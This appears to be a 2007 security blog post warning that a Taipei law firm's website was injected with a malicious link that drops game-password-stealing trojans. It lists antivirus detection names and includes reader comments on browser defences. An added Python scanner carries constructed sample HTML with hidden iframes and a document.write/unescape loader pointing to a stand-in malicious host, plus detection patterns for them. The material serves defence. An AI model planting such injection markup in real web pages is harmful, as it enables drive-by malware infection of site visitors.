永然聯合法律事務所 Taipei office website injected with a malicious link

2007-06-27 17:39:00

The website of the Taipei office of 永然聯合法律事務所 has been injected with a malicious link. The malware it delivers is PE_LOOKED together with an OnLineGames variant. Anyone who has browsed this site recently should check their computer as soon as possible, and please stay away from the site for the time being to avoid infection. This post will be updated once it is confirmed that they have cleaned it up. (The malware almost certainly steals account names and passwords.) Anyone interested can test it in a virtual machine, report back on whether it has been fixed, and help notify them. Thanks.

The malicious link is placed in the home page (the other pages may need a careful check too):

Once it runs, the result is pretty bad; please be careful.
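As an added example that is not part of the original post: a small Python scanner for the kind of injection described above, run over a constructed sample page. It flags hidden or off-site iframes, script includes pulled from another host, and inline scripts that assemble the loader with document.write()/unescape(), which is how these injections usually hide. The hostnames in SITE_HOST and SAMPLE_HTML are made up for illustration; point the scanner at the saved source of your own home page and use your own hostname.

```python
"""Scan an HTML page for the kind of injection described in this post.

Added example (not from the original post). It looks for three things that
drive-by injections of this era typically leave behind:
  * <iframe> elements sized to 0/1 pixels or hidden with CSS,
  * <iframe>/<script src> that load from a host other than the site itself,
  * inline scripts that build the loader with document.write()/unescape().
SITE_HOST and SAMPLE_HTML are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.lawfirm.example"   # assumed: the site's own hostname (constructed)

# Constructed sample: a normal page with three injected items appended at the end.
SAMPLE_HTML = """<html><head><title>Law office</title>
<script src="/js/menu.js"></script></head><body>
<h1>Welcome</h1>
<iframe src="http://www.lawfirm.example/news.html" width="600" height="400"></iframe>
<iframe src="http://bad.example/1.htm" width="0" height="0" frameborder="0"></iframe>
<script src="http://bad.example/2.js"></script>
<script>document.write(unescape("%3Ciframe src=http://bad.example/3.htm width=0 height=0%3E%3C/iframe%3E"));</script>
</body></html>
"""

INLINE_LOADER = re.compile(r"document\.write\s*\(|unescape\s*\(|%3Ciframe", re.I)


def _is_hidden(attrs):
    """Zero/one-pixel frames or CSS-hidden elements: nothing a real page needs."""
    w = attrs.get("width", "").strip().lower().rstrip("px")
    h = attrs.get("height", "").strip().lower().rstrip("px")
    style = attrs.get("style", "").replace(" ", "").lower()
    return (w in ("0", "1") or h in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


def _is_offsite(src, site_host):
    """True when src names a host other than the site itself (relative URLs pass)."""
    host = urlparse(src).hostname
    return host is not None and host.lower() != site_host.lower()


class InjectionScanner(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.in_script = False
        self.findings = []          # list of (tag, src_or_snippet, reason)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        if tag == "iframe":
            if _is_hidden(a):
                self.findings.append(("iframe", src, "hidden iframe"))
            elif _is_offsite(src, self.site_host):
                self.findings.append(("iframe", src, "off-site iframe"))
        elif tag == "script":
            self.in_script = True
            if src and _is_offsite(src, self.site_host):
                self.findings.append(("script", src, "off-site script"))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies over raw, so the loader pattern can be grepped.
        if self.in_script and INLINE_LOADER.search(data):
            self.findings.append(("script", data.strip()[:60],
                                  "inline document.write/unescape loader"))


def scan_html(html, site_host=SITE_HOST):
    """Return the suspicious (tag, src_or_snippet, reason) tuples found in html."""
    p = InjectionScanner(site_host)
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for tag, src, reason in scan_html(SAMPLE_HTML):
        print(f"{reason:40} <{tag}> {src}")
```

Run it against a copy of the page fetched with a non-browser client (or straight from the web server's document root), since the injected markup is often served only to certain User-Agents or only once per visitor. An empty result does not prove the site is clean: obfuscation beyond document.write/unescape, or an injection in a shared include rather than the home page, will slip past these three checks.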

As of now (2007/6/25 @ 11:28), the following anti-virus products detect these malicious files (for reference only):

2[1].exe:
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "TrojanDropper:Win32/Agent.gen!A"
[ Kaspersky ], "Trojan-Proxy.Win32.Small.du"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
2[2].exe:
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "TrojanDropper:Win32/Agent.gen!A"
[ Kaspersky ], "Trojan-Proxy.Win32.Small.du"
[ McAfee ], "[00000c70.EXE]:corrupted"
[ Fortinet ], "suspicious"
7[1].exe:
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.te"
[ McAfee ], "New Malware.bl !!"
[ Nod32 ], "Win32/PSW.OnLineGames.YA trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Crypt.XPACK.Gen"
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Ewido ], "Trojan.OnLineGames.wp"
LYLOADER.EXE:
[ Alpha_Gen ], "Possible_Virus"
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "[->(Upack)->[RSRCEmb]]:VirTool:Win32/Obfuscator.C"
[ Kaspersky ], "PAK:PE_Patch, PAK:UPack, Trojan-PSW.Win32.OnLineGames.nn"
[ McAfee ], "New Malware.aj !!"
[ Panda ], "Suspicious file"
[ Nod32 ], "a variant of Win32/PSW.Agent.NEC trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/PSW.OnLineGames.NN.213"
[ Norman ], "Security Risk W32/Suspicious_U.gen"
LYMANGR.DLL:
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "VirTool:Win32/Obfuscator.C"
[ Kaspersky ], "PAK:UPack, Trojan-PSW.Win32.OnLineGames.nn"
[ McAfee ], "Generic PWS.j"
[ Fortinet ], "PWS.J!tr"
[ HBEDV ], "TR/PSW.OnLineGames.NN.213"
[ Norman ], "Security Risk W32/Suspicious_U.gen"
[ Ewido ], "Trojan.OnLineGames.nn"
msccrt.dll:
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.es"
[ Nod32 ], "a variant of Win32/PSW.OnLineGames.NBZ trojan"
[ HBEDV ], "HEUR/Malware"
msccrt.exe:
[ Microsoft ], "PWS:Win32/Lmir.gen!J"
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.es"
[ Nod32 ], "a variant of Win32/PSW.OnLineGames.YA trojan"
[ HBEDV ], "TR/Dropper.Gen"
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Ewido ], "Trojan.OnLineGames.es"
msdebug.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
netsrvcs.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
Ravasktao.dll:
[ Alpha_Gen ], "Possible_OLGM-8"
[ Microsoft ], "PWS:Win32/Skatayo.A!dll"
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.ql"
[ McAfee ], "PWS-LegMir.dll"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Spy.Gen"
[ Rising ], "Trojan.PSW.Win32.AskTao.d"
[ Ewido ], "Trojan.OnLineGames.ql"
RemoteDbg.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ McAfee ], "BackDoor-DKH"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
RichDll.dll:
[ Symantec ], "W32.Looked.AH"
[ Microsoft ], "[->(Petite 2.2)]:Virus:Win32/Viking.gen"
[ Kaspersky ], "PAK:Petite, Worm.Win32.Viking.ls"
[ McAfee ], "W32/HLLP.Philis.dll"
[ Panda ], "W32/Viking.VG.worm"
[ Nod32 ], "probably a variant of Win32/Viking virus"
[ Fortinet ], "W32/Viking.LS"
[ HBEDV ], "TR/PSW.Delf.AF.2"
[ Ewido ], "Worm.Viking.ls"
RUNDLL32.exe:
[ Alpha_Gen ], "Possible_Virus"
[ Kaspersky ], "PAK:PE_Patch, PAK:UPack, Trojan-PSW.Win32.OnLineGames.mk"
[ McAfee ], "New Malware.aj !!"
[ Fortinet ], "suspicious"
[ HBEDV ], "HEUR/Crypted"
[ Norman ], "Security Risk W32/Suspicious_U.gen"
sys174.exe:
[ Symantec ], "Infostealer"
[ Microsoft ], "TrojanDownloader:Win32/Small.gen!N"
[ Kaspersky ], "Trojan-Downloader.Win32.Agent.bkm"
[ Nod32 ], "probably a variant of Win32/TrojanDownloader.Delf.NJH trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Hijack.Explor.3546"
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Rising ], "Trojan.DL.Win32.Mnless.apg"
sys250.exe:
[ Symantec ], "Infostealer"
[ Microsoft ], "TrojanDownloader:Win32/Small.gen!N"
[ Kaspersky ], "Trojan-Downloader.Win32.Agent.bkm"
[ Nod32 ], "probably a variant of Win32/TrojanDownloader.Delf.NJH trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Hijack.Explor.3546"
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Rising ], "Trojan.DL.Win32.Mnless.apg"
test[1].exe:
[ HBEDV ], "HEUR/Malware"
TIMHost.dll:
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.yn"
[ Panda ], "Trj/Agent.FTX"
[ HBEDV ], "HEUR/Malware"
[ Rising ], "Trojan.PSW.Win32.RocOnline.b"
[ Ewido ], "Trojan.OnLineGames.yn"
TIMHost.exe:
[ Symantec ], "Infostealer.Gampass"
[ Microsoft ], "PWS:Win32/Lmir.gen!J"
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.yn"
[ Nod32 ], "a variant of Win32/PSW.OnLineGames.YA trojan"
[ HBEDV ], "TR/Dropper.Gen"
[ Norman ], "Trojan W32/OnLineGames.HGK"
[ Rising ], "Trojan.PSW.Win32.RocOnline.b"
[ Ewido ], "Trojan.OnLineGames.yn"
windds32.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
windhcp.ocx:
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, Trojan-Proxy.Win32.Small.fl"
[ McAfee ], "BackDoor-DKH"
[ Panda ], "Trj/Gampass.B"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
[ HBEDV ], "TR/Agent.22016.B"
WinForm.exe:
[ Kaspersky ], "Trojan-PSW.Win32.OnLineGames.te"
[ McAfee ], "New Malware.bl !!"
[ Nod32 ], "Win32/PSW.OnLineGames.YA trojan"
[ Fortinet ], "suspicious"
[ HBEDV ], "TR/Crypt.XPACK.Gen"
[ Norman ], "[Heuristic Sandbox detection]:Virus W32/Malware"
[ Ewido ], "Trojan.OnLineGames.wp"
WMIApiSrv.dll:
[ Symantec ], "Infostealer"
[ Kaspersky ], "PAK:PE_Patch.PECompact, PAK:PecBundle, PAK:PECompact"
[ McAfee ], "BackDoor-DKH"
[ Nod32 ], "a variant of Win32/Agent.NIK trojan"
0[1].exe:
[ Trend ], "TSPY_DELF.HGK"
1[1].exe:
[ Trend ], "PE_LOOKED.ACM-O"
game.com:
[ Trend ], "TSPY_DELF.HGK"
Logo1_.exe:
[ Trend ], "PE_LOOKED.ACM-O"
msimg32.dll:
[ Trend ], "TSPY_LEGMIR.BPW"
MsIMMs32.exe:
[ Trend ], "TSPY_LEGMIR.BPX"
rundl132.exe:
[ Trend ], "PE_LOOKED.ACM-O"
SERVICES.exe:
[ Trend ], "TSPY_ONLINEG.FDO"
sservet.exe:
[ Trend ], "TROJ_DELF.ECJ"
sys211.exe:
[ Trend ], "TROJ_DELF.ECJ"
sys263.exe:
[ Trend ], "TROJ_DELF.ECJ"
sys270.exe:
[ Trend ], "PE_LOOKED.ACM-O"
sys321142.exe:
[ Trend ], "TSPY_ONLINEG.EEZ"
sys90.exe:
[ Trend ], "PE_LOOKED.ACM-O"
WinForm.dll:
[ Trend ], "TSPY_ONLINEG.DHY"

"永然聯合法律事務所 Taipei office website injected with a malicious link" currently has 2 comments

hi, roger
I suppose sites like this are all cases where the system was broken into
and the pages tampered with afterwards...
For an ordinary user who browses these hacked sites,
is there any way to prevent this at the root??
Even with antivirus installed, if the signatures are not updated
it still will not catch it.
Could one just block the iframe tag directly,
or is there software that blocks (or at least prompts on) any executable file created on the system through the web channel??
thanks!!

By Anonymous on 2007-06-28 02:06:00

Most of them have a vulnerability in the system; that is how the malicious link gets planted.

Basically, you can set IE's security level to "High"; with that setting many things cannot run. You can also disable script execution and set file downloads to always prompt.

Right now gateway antivirus can do this, but client-side antivirus cannot, unless it has HTTP filtering and file blocking capabilities.

By Roger on 2007-06-28 09:16:00
